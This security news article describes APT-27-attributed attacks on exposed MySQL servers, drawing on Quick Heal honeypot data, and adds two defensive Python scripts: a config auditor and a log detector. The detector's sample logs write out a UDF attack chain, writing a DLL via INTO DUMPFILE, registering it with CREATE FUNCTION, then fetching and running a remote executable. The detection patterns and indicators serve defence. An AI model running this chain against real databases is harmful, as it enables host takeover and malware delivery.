Thursday, March 28, 2024

Hackers From Chinese APT-27 Group Initiated 15000 Attacks Against MySQL Servers to Compromise Enterprise Networks

Attackers attributed to the APT-27 group are targeting high-profile enterprise networks by compromising Internet-exposed MySQL servers and using them to deliver malware such as the NewCore RAT (Remote Access Trojan), which has been linked to Chinese APT campaigns.

Most enterprise networks rely on a cloud platform to store sensitive data; attackers equally use cloud services to run their bots and command-and-control (C&C) servers.

Even where enterprises patch every OS-level vulnerability, they often fail to secure the server running MySQL, which is left open to the public Internet.

Based on Shodan search results, nearly 4.9 million MySQL servers are reachable on public IP addresses. Where the MySQL service runs under a privileged account (for example LocalSystem on a Windows install), an attacker who can log in to MySQL can gain complete control of the host without exploiting any software vulnerability: valid credentials plus the database's own ability to write files and load functions are enough.
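As an added example (not from the article or from Quick Heal), the following Python script audits a MySQL option file for the exposure just described: a server that listens on every interface with no restriction on where the database may write files. The two option files and their values are constructed samples; the Windows service-account check is only noted in a comment because it is not visible in my.ini.

```python
"""Audit a MySQL option file for the exposure described above.

Added example; it is not part of the article or of Quick Heal's research.
It parses an INI-style my.cnf / my.ini and flags the settings that turn a
stolen or brute-forced database password into control of the host:
listening on every interface, an unrestricted secure_file_priv (which lets
SELECT ... INTO DUMPFILE write a UDF library into the plugin directory), and
LOAD DATA LOCAL enabled. The two option files below are constructed samples.
"""
import configparser

# Constructed: an exposed server like the ones in the Shodan figures.
EXPOSED_MY_CNF = """
[mysqld]
bind-address = 0.0.0.0
port = 3306
secure_file_priv =
local_infile = 1
"""

# Constructed: the same server hardened.
HARDENED_MY_CNF = """
[mysqld]
bind-address = 127.0.0.1
port = 3306
secure_file_priv = /var/lib/mysql-files   # or NULL to disable file I/O entirely
local_infile = 0
"""


def load_mysqld_options(text):
    """Return the [mysqld] section as a dict, with '-' normalised to '_'
    (MySQL treats bind-address and bind_address as the same option)."""
    # configparser cannot parse !include / !includedir directives; skip them.
    body = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("!"))
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, inline_comment_prefixes=("#",))
    cp.read_string(body)
    if not cp.has_section("mysqld"):
        return {}
    return {k.replace("-", "_"): ("" if v is None else v.strip())
            for k, v in cp.items("mysqld")}


def is_on(value):
    return value.strip().lower() in {"1", "on", "true", "yes"}


def audit_mysqld(text):
    """Return a list of (severity, option, explanation) findings."""
    opts = load_mysqld_options(text)
    findings = []

    # Default bind_address is '*' (all interfaces) unless networking is off.
    if "skip_networking" not in opts:
        bind = opts.get("bind_address", "*")
        if bind in ("*", "0.0.0.0", "::"):
            findings.append(("HIGH", "bind_address",
                             f"listens on all interfaces ({bind}); bind to 127.0.0.1 "
                             "or an internal address and firewall port 3306"))

    sfp = opts.get("secure_file_priv")
    if sfp is None:
        findings.append(("MEDIUM", "secure_file_priv",
                         "not set explicitly; the default varies by version, "
                         "check SHOW VARIABLES LIKE 'secure_file_priv'"))
    elif sfp == "":
        findings.append(("HIGH", "secure_file_priv",
                         "empty, so INTO DUMPFILE/OUTFILE can write anywhere the "
                         "service account can, including the plugin directory"))

    if is_on(opts.get("local_infile", "")):
        findings.append(("MEDIUM", "local_infile",
                         "LOAD DATA LOCAL enabled; a hostile server can read client files"))

    # Not visible in the option file: on Windows, check the service account
    # (sc qc <service name>) and make sure mysqld is not running as LocalSystem.
    return findings


if __name__ == "__main__":
    for name, cfg in (("exposed", EXPOSED_MY_CNF), ("hardened", HARDENED_MY_CNF)):
        print(name, audit_mysqld(cfg) or "no findings")
```

Run it against the real my.cnf by reading the file into `audit_mysqld`; pair the result with a `SHOW VARIABLES` check on the live server, because options set on the command line or in included files do not show up in a single option file.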

Researchers from Quick Heal observed nearly 15,000 attacks against their honeypot system; 34% targeted Germany, with the rest spread across other countries including the United States, France, China, Poland, and Russia.

Threat Actors Different Approaches

Attackers use two different approaches to abuse MySQL servers and compromise the associated enterprise network.

1. They gain entry to the database server, drop the existing tables, and insert a ransom note as a blob in a newly created table.

2. They use MySQL as an entrance into the underlying Linux or Windows host and then drop a backdoor, miner, or ransomware onto it.

In both cases the initial access comes from weaknesses in the MySQL deployment itself: default credentials such as the root account with its default or a weak password, brute-force attacks using a list of about 1,000 well-known passwords, and SQL injection.

Beyond this, attackers also make use of web shells and authentication-bypass vulnerabilities that let them take control of the server without any credentials, and then manipulate, delete, or steal its data.

According to Quick Heal's research, attackers use a function that downloads a file from a URL and executes it on the infected server. Every application executed by mysqld.exe runs with the same system privilege as the service itself. Because the payload is fetched and launched from inside the database process, it evades many detections and can also be used to launch file-less malware attacks.
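As an added example that is not part of the original article or Quick Heal's research: the usual way to give mysqld a download-and-execute function is a user-defined function (UDF) library that the attacker first writes into the plugin directory with SELECT ... INTO DUMPFILE and then registers with CREATE FUNCTION ... SONAME. The script below runs detection logic for that sequence, and for the credential brute force described earlier, over constructed MySQL general-log and error-log lines; the connection ids, addresses, plugin path and the UDF name `downloader` are assumptions.

```python
"""Hunt for the MySQL-as-entry-point sequence in server logs.

Added example, not from the article or Quick Heal's research. The general
query log and error log lines below are constructed; connection ids,
timestamps, addresses, the plugin path and the UDF name `downloader` are all
assumptions. The general log must be enabled (general_log=ON) to see queries.
"""
import re
from collections import Counter

# Constructed general log. Real format: <timestamp>\t<conn id> <command>\t<argument>.
GENERAL_LOG = "\n".join([
    "2024-03-20T10:15:01.100000Z\t   12 Connect\troot@203.0.113.5 on  using TCP/IP",
    "2024-03-20T10:15:01.200000Z\t   12 Query\tSELECT @@version_compile_os, @@plugin_dir",
    "2024-03-20T10:15:02.000000Z\t   12 Query\tSELECT 0x4d5a9000 INTO DUMPFILE "
    "'C:/Program Files/MySQL/lib/plugin/udf.dll'",
    "2024-03-20T10:15:02.500000Z\t   12 Query\tCREATE FUNCTION downloader RETURNS INTEGER SONAME 'udf.dll'",
    "2024-03-20T10:15:03.000000Z\t   12 Query\tSELECT downloader('http://example.invalid/csrss.exe', "
    "'C:/Windows/Temp/csrss.exe')",
    "2024-03-20T10:15:04.000000Z\t   13 Connect\tapp@10.0.0.8 on shop using TCP/IP",
    "2024-03-20T10:15:04.100000Z\t   13 Query\tSELECT COUNT(*) FROM orders",
    "2024-03-20T10:15:05.000000Z\t   12 Quit\t",
])

# Constructed error log: six failed root logins from one host, two from another.
ERROR_LOG = "\n".join(
    [f"2024-03-20T10:14:{50 + i:02d}.000000Z 9 [Note] [MY-010926] [Server] "
     "Access denied for user 'root'@'203.0.113.5' (using password: YES)" for i in range(6)]
    + [f"2024-03-20T10:14:{56 + i:02d}.000000Z 10 [Note] [MY-010926] [Server] "
       "Access denied for user 'root'@'198.51.100.7' (using password: YES)" for i in range(2)]
)

ACCESS_DENIED = re.compile(r"Access denied for user '([^']*)'@'([^']*)'")
GENLOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s*(.*)$")
UDF_NAME = re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?(?:AGGREGATE\s+)?FUNCTION\s+`?(\w+)`?", re.I)
SUSPICIOUS = [
    ("plugin_dir_recon", re.compile(r"@@(?:global\.)?plugin_dir\b", re.I)),
    ("file_write", re.compile(r"\bINTO\s+(?:DUMP|OUT)FILE\b", re.I)),
    ("udf_load", re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?(?:AGGREGATE\s+)?FUNCTION\b.*\bSONAME\b",
                            re.I | re.S)),
    ("file_read", re.compile(r"\bLOAD_FILE\s*\(", re.I)),
]


def brute_force_sources(error_log, threshold=5):
    """Map (user, source host) -> failed-login count, for sources at or over threshold."""
    counts = Counter()
    for line in error_log.splitlines():
        m = ACCESS_DENIED.search(line)
        if m:
            counts[(m.group(1), m.group(2))] += 1
    return {k: n for k, n in counts.items() if n >= threshold}


def parse_general_log(text):
    """Split the general log into entries; untimestamped lines continue a multi-line statement."""
    entries = []
    for line in text.splitlines():
        m = GENLOG_LINE.match(line)
        if m:
            ts, cid, cmd, arg = m.groups()
            entries.append({"ts": ts, "id": int(cid), "cmd": cmd, "arg": arg})
        elif entries:
            entries[-1]["arg"] += "\n" + line
    return entries


def suspicious_statements(general_log):
    """Flag file writes, UDF loading and calls to freshly created UDFs, attributed to user@host."""
    users, udfs, hits = {}, set(), []
    for e in parse_general_log(general_log):
        if e["cmd"] == "Connect":
            users[e["id"]] = e["arg"].split(" on", 1)[0]   # "user@host on db using ..."
            continue
        if e["cmd"] != "Query":
            continue
        q = e["arg"]
        rules = [name for name, rx in SUSPICIOUS if rx.search(q)]
        m = UDF_NAME.search(q)
        if m:
            udfs.add(m.group(1).lower())   # remember the name so later calls are flagged too
        elif not rules and any(re.search(rf"\b{re.escape(fn)}\s*\(", q, re.I) for fn in udfs):
            rules.append("udf_call")
        for name in rules:
            hits.append({"ts": e["ts"], "id": e["id"], "user": users.get(e["id"], "?"),
                         "rule": name, "query": q})
    return hits


if __name__ == "__main__":
    print("brute force:", brute_force_sources(ERROR_LOG))
    for h in suspicious_statements(GENERAL_LOG):
        print(f"{h['ts']} conn {h['id']} {h['user']} {h['rule']}: {h['query'][:60]}")
```

A single `INTO DUMPFILE` followed by `CREATE FUNCTION ... SONAME` on the same connection is the highest-fidelity signal here; the brute-force counter is noisy on its own but useful for joining the source host of the failed logins with the user@host that later wrote the file.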

Alongside this, various malware families are distributed using MySQL as the delivery point, including viruses, backdoors, and miners.

Researchers also obtained a NewCore RAT sample attributed to APT-27, a Chinese APT actor that mainly targets government entities and data centers.

“After dropping the malicious database, the attacker inserts a ransom note and asks for a ransom. But it is suggested that in this type of attack you don’t pay the ransom, as the attacker is not reading or taking a backup of the database, so there is no way that they can restore the database after payment.” Quick Heal reported.

Indicators of Compromise

IDS/IPS Detection:

MySQL/EXEFileWrite.UN!SP.34758
MySQL/CommandExecution.UN!SP.34759
MySQL/CommandExecution.UN!SP.34760
MySQL/EXEFileWrite.UN!SP.34776

Antivirus detection:

W32.Virut.G
Backdoor.Agent
Backdoor.Dofloo.CE99d
Trojan.Mauvaise.SL1
Trojan.Agent.S175662

Attack IoCs (file hashes):

D6362BDF13A789790E7CADCD110B9E4D
A5B019DDB693B0EC32B7A400957EDA24
c419cdd0dece9c183b3865b9c2db23fb
6F5E0882316C5BFE9420D91058F53BE8
F0044BCB4B1D4A6A39B766F864D9861A
19230C66AA4A550770D7C83BA8CC6027
B36150FEC88C917112B2C8801511C076
313909878C72ACA7E1D79CE221B1AC47

Network indicators (defanged):

43[.]242[.]75[.]228
y[.]aibeichen[.]cn/csrss.exe

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
